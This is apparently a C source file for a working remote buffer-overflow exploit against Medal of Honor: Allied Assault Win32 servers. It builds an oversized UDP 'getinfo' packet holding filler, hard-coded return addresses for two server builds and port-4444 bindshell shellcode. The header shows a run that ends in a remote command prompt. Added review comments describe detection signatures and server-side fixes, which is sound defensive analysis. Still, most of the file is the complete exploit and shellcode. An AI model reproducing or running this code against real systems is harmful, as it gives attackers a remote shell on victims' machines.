/*
MOHAA Win32 Server Buffer-Overflow Exploit (getinfo)
Written by RunningBon
Please use this responsibly, as I am not responsible for any damage you cause by using it.
IRC: irc.rizon.net #kik
E-mail: [email protected]
Thanks to: Luigi Auriemma, Metasploit, everyone else (You know who you are.)
Example:
C:\>MOHAAExploit.exe 192.168.2.44 12203 MOHAA-v1.11
MoHAA Server Buffer overflow exploit
Written by RunningBon
E-Mail: [email protected]
IRC: irc.rizon.net #kik
Attempting to exploit 192.168.2.44:12203, running version MOHAA-v1.11.
Building packet.
Sending packet.
Packet sent.
Check for your shell on port 4444.
C:\>telnet 192.168.2.44 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\EA GAMES\MOHAA>
*/
#include <stdio.h>
#include <windows.h>
// One row of per-build parameters consumed by Exploit(); main() selects the
// row whose pName matches the third command-line argument.
struct VersionStruct {
// Version label, compared case-insensitively against argv[3] in main().
char *pName;
// 4-byte value Exploit() copies into the packet directly after the filler.
// NOTE(review): by its name this is the intended saved-EIP overwrite - confirm.
DWORD dwNewEIP;
// Number of 'z' filler bytes Exploit() writes before dwNewEIP.
DWORD dwFillLength;
};
// Table of supported builds: { pName, dwNewEIP, dwFillLength } per row.
// Both rows use the same filler length (516) and differ only in the
// hard-coded 32-bit value that Exploit() places after the filler.
// NOTE(review): a fixed absolute address is only usable where the target
// image loads at a predictable base; address-space randomisation and
// non-executable stacks are the platform mitigations that break this
// assumption - confirm which of them the affected server builds support.
VersionStruct Versions[] = {
"MOHAA-v1.11", 0xCBB935, 516,
"MOHAA:S-v2.15", 0x923575, 516,
// TODO left by the original author: add MOHAA:Breakthrough support
};
#pragma comment (lib, "ws2_32.lib")
//Port 4444 bindshell
// Payload bytes that Exploit() appends after the 4-byte dwNewEIP value.
// The label above is the original author's; the bytes are opaque at this
// level and were not decoded for this review.
// Defender note: the transcript in the file header shows a telnet session to
// port 4444 on the target returning a Windows command prompt in the server's
// install directory. On a dedicated game-server host, the server process
// opening a new TCP listener or spawning a command interpreter is therefore
// the post-compromise signal to alert on, and inbound TCP 4444 should not be
// reachable through the perimeter filter in the first place.
// The initialiser is a string literal, so the array carries a trailing NUL
// that sizeof(szShellcode) counts.
unsigned char szShellcode[] =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x42"
"\xec\xee\x81\x83\xeb\xfc\xe2\xf4\xbe\x86\x05\xcc\xaa\x15\x11\x7e"
"\xbd\x8c\x65\xed\x66\xc8\x65\xc4\x7e\x67\x92\x84\x3a\xed\x01\x0a"
"\x0d\xf4\x65\xde\x62\xed\x05\xc8\xc9\xd8\x65\x80\xac\xdd\x2e\x18"
"\xee\x68\x2e\xf5\x45\x2d\x24\x8c\x43\x2e\x05\x75\x79\xb8\xca\xa9"
"\x37\x09\x65\xde\x66\xed\x05\xe7\xc9\xe0\xa5\x0a\x1d\xf0\xef\x6a"
"\x41\xc0\x65\x08\x2e\xc8\xf2\xe0\x81\xdd\x35\xe5\xc9\xaf\xde\x0a"
"\x02\xe0\x65\xf1\x5e\x41\x65\xc1\x4a\xb2\x86\x0f\x0c\xe2\x02\xd1"
"\xbd\x3a\x88\xd2\x24\x84\xdd\xb3\x2a\x9b\x9d\xb3\x1d\xb8\x11\x51"
"\x2a\x27\x03\x7d\x79\xbc\x11\x57\x1d\x65\x0b\xe7\xc3\x01\xe6\x83"
"\x17\x86\xec\x7e\x92\x84\x37\x88\xb7\x41\xb9\x7e\x94\xbf\xbd\xd2"
"\x11\xbf\xad\xd2\x01\xbf\x11\x51\x24\x84\xff\xdd\x24\xbf\x67\x60"
"\xd7\x84\x4a\x9b\x32\x2b\xb9\x7e\x94\x86\xfe\xd0\x17\x13\x3e\xe9"
"\xe6\x41\xc0\x68\x15\x13\x38\xd2\x17\x13\x3e\xe9\xa7\xa5\x68\xc8"
"\x15\x13\x38\xd1\x16\xb8\xbb\x7e\x92\x7f\x86\x66\x3b\x2a\x97\xd6"
"\xbd\x3a\xbb\x7e\x92\x8a\x84\xe5\x24\x84\x8d\xec\xcb\x09\x84\xd1"
"\x1b\xc5\x22\x08\xa5\x86\xaa\x08\xa0\xdd\x2e\x72\xe8\x12\xac\xac"
"\xbc\xae\xc2\x12\xcf\x96\xd6\x2a\xe9\x47\x86\xf3\xbc\x5f\xf8\x7e"
"\x37\xa8\x11\x57\x19\xbb\xbc\xd0\x13\xbd\x84\x80\x13\xbd\xbb\xd0"
"\xbd\x3c\x86\x2c\x9b\xe9\x20\xd2\xbd\x3a\x84\x7e\xbd\xdb\x11\x51"
"\xc9\xbb\x12\x02\x86\x88\x11\x57\x10\x13\x3e\xe9\xb2\x66\xea\xde"
"\x11\x13\x38\x7e\x92\xec\xee\x81";
// Fatal-error helper: writes "[ERROR] <pString>" to stdout and terminates
// the process via ExitProcess(0). It never returns, so any statement a
// caller places after a call to Error() is unreachable. Note that the exit
// code is 0 even though this is the failure path.
void Error(char *pString)
{
    fprintf(stdout, "[ERROR] %s\n", pString);
    ExitProcess(0);
}
/*
 * Builds one UDP datagram and sends it to pIP:iPort.
 *
 * Datagram layout, in the order assembled below:
 *   1. szHeader: FF FF FF FF 02 followed by "getinfo " (terminating NUL excluded)
 *   2. pVersion->dwFillLength bytes of 'z'
 *   3. the 4 bytes of pVersion->dwNewEIP, copied in host byte order
 *   4. szShellcode, including the string literal's trailing NUL
 *
 * Returns 1 once sendto() has succeeded. Both failure paths call Error(),
 * which ends the process, so the `return 0` statements after it are never
 * reached.
 *
 * Review notes (defensive):
 *  - The whole interaction is a single unauthenticated datagram and no reply
 *    is read, so filtering cannot lean on connection state; it has to look at
 *    the datagram itself.
 *  - Detection: a datagram to the game port that begins with
 *    FF FF FF FF 02 "getinfo " and then carries several hundred further bytes
 *    (516 filler + 4 + payload for both table rows). Presumably that is far
 *    longer than any legitimate getinfo query - confirm against normal
 *    traffic before alerting on length alone.
 *  - Root cause is presumably an unbounded copy of the getinfo argument into
 *    a fixed-size buffer in the server (not visible in this file); the real
 *    fix is a bounds-checked copy on the server side, with edge filtering of
 *    over-long getinfo queries as the interim control.
 *  - Nothing here checks that header + fill + 4 + payload fits in
 *    szBuffer[4096]; it does for the table's values, but a larger
 *    dwFillLength would overrun this local buffer.
 *  - WSAStartup()'s result is ignored, the socket is never closed and
 *    WSACleanup() is never called.
 */
int Exploit(char *pIP, int iPort, VersionStruct *pVersion)
{
WSAData WSADATA;
SOCKET Socket = NULL;
sockaddr_in SockAddr;
// Connectionless-query prefix plus the command name and one trailing space.
char szHeader[] = "\xff\xff\xff\xff\x02getinfo ";
char szBuffer[4096];
// Running write offset into szBuffer; also the final datagram length.
int iLen = 0;
WSAStartup(MAKEWORD(1, 1), &WSADATA);
// NOTE(review): socket() reports failure as INVALID_SOCKET; this compares
// against SOCKET_ERROR instead.
if((Socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == SOCKET_ERROR)
{
Error("socket()");
return 0;
}
// Only these three fields are set; the rest of SockAddr is left uninitialised.
SockAddr.sin_addr.s_addr = inet_addr(pIP);
SockAddr.sin_port = htons(iPort);
SockAddr.sin_family = AF_INET;
printf("Building packet.\n");
memset(szBuffer, 0, sizeof(szBuffer));
// sizeof - 1 drops the header's terminating NUL so the filler follows directly.
memcpy(szBuffer, szHeader, sizeof(szHeader) - 1);
iLen += sizeof(szHeader) - 1;
// Filler length comes straight from the version table, with no bounds check.
memset(szBuffer + iLen, 'z', pVersion->dwFillLength);
iLen += pVersion->dwFillLength;
// Raw copy of the DWORD, i.e. little-endian on x86 Windows.
memcpy(szBuffer + iLen, (LPVOID)&pVersion->dwNewEIP, sizeof(DWORD));
iLen += sizeof(DWORD);
// sizeof counts the literal's trailing NUL, so one 0x00 byte ends the datagram.
memcpy(szBuffer + iLen, szShellcode, sizeof(szShellcode));
iLen += sizeof(szShellcode);
printf("Sending packet.\n");
if(sendto(Socket, szBuffer, iLen, 0, (sockaddr*)&SockAddr, sizeof(SockAddr)) == SOCKET_ERROR)
{
Error("sendto()");
return 0;
}
// Success here means only that the datagram was handed to the stack;
// nothing is read back from the target.
printf("Packet sent.\n");
return 1;
}
// Prints the fixed banner (tool name, author, contact lines, blank line)
// to stdout. Takes no input and has no other effect.
void PrintWelcome()
{
    static const char szBanner[] =
        "MoHAA Server Buffer overflow exploit\n"
        "Written by RunningBon\n"
        "E-Mail: [email protected]\n"
        "IRC: irc.rizon.net #kik\n"
        "\n";

    // The banner contains no conversion specifiers, so a plain write is
    // equivalent to the formatted one.
    fputs(szBanner, stdout);
}
// Prints the command-line synopsis followed by every version label in the
// Versions table, one per line. pPath is the program name shown in the
// synopsis (main() passes argv[0]).
void PrintUsage(char *pPath)
{
    const size_t nVersions = sizeof(Versions) / sizeof(Versions[0]);

    printf("Usage: %s <IP> <Port> <Version Name>\n\n", pPath);
    printf("Supported Version List:\n");

    // Walk the table by pointer rather than by index.
    for (const VersionStruct *pEntry = Versions; pEntry != Versions + nVersions; ++pEntry)
    {
        printf("%s\n", pEntry->pName);
    }
}
// Entry point. Expects <IP> <Port> <Version Name>; prints the banner, shows
// usage when fewer than three arguments are given, resolves the version
// label against the Versions table (case-insensitive), then hands the
// target to Exploit(). Always returns 0; an unknown version ends the
// process inside Error().
// The port argument is converted with atoi(), so non-numeric input
// silently becomes 0 and the value is not range-checked.
int main(int argc, char **argv)
{
    PrintWelcome();

    if (argc < 4)
    {
        PrintUsage(argv[0]);
        return 0;
    }

    // First table row whose label matches argv[3] wins.
    VersionStruct *pVersion = NULL;
    const size_t nVersions = sizeof(Versions) / sizeof(Versions[0]);
    for (size_t idx = 0; idx < nVersions && pVersion == NULL; ++idx)
    {
        if (stricmp(argv[3], Versions[idx].pName) == 0)
        {
            pVersion = &Versions[idx];
        }
    }

    if (!pVersion)
    {
        // Error() terminates the process, so pVersion is non-NULL below.
        Error("Invalid version.");
    }

    const int iPort = atoi(argv[2]);
    printf("Attempting to exploit %s:%d, running version %s.\n", argv[1], iPort, pVersion->pName);

    if (Exploit(argv[1], iPort, pVersion) != 0)
    {
        printf("Check for your shell on port 4444.\n");
    }

    return 0;
}
// sebug.net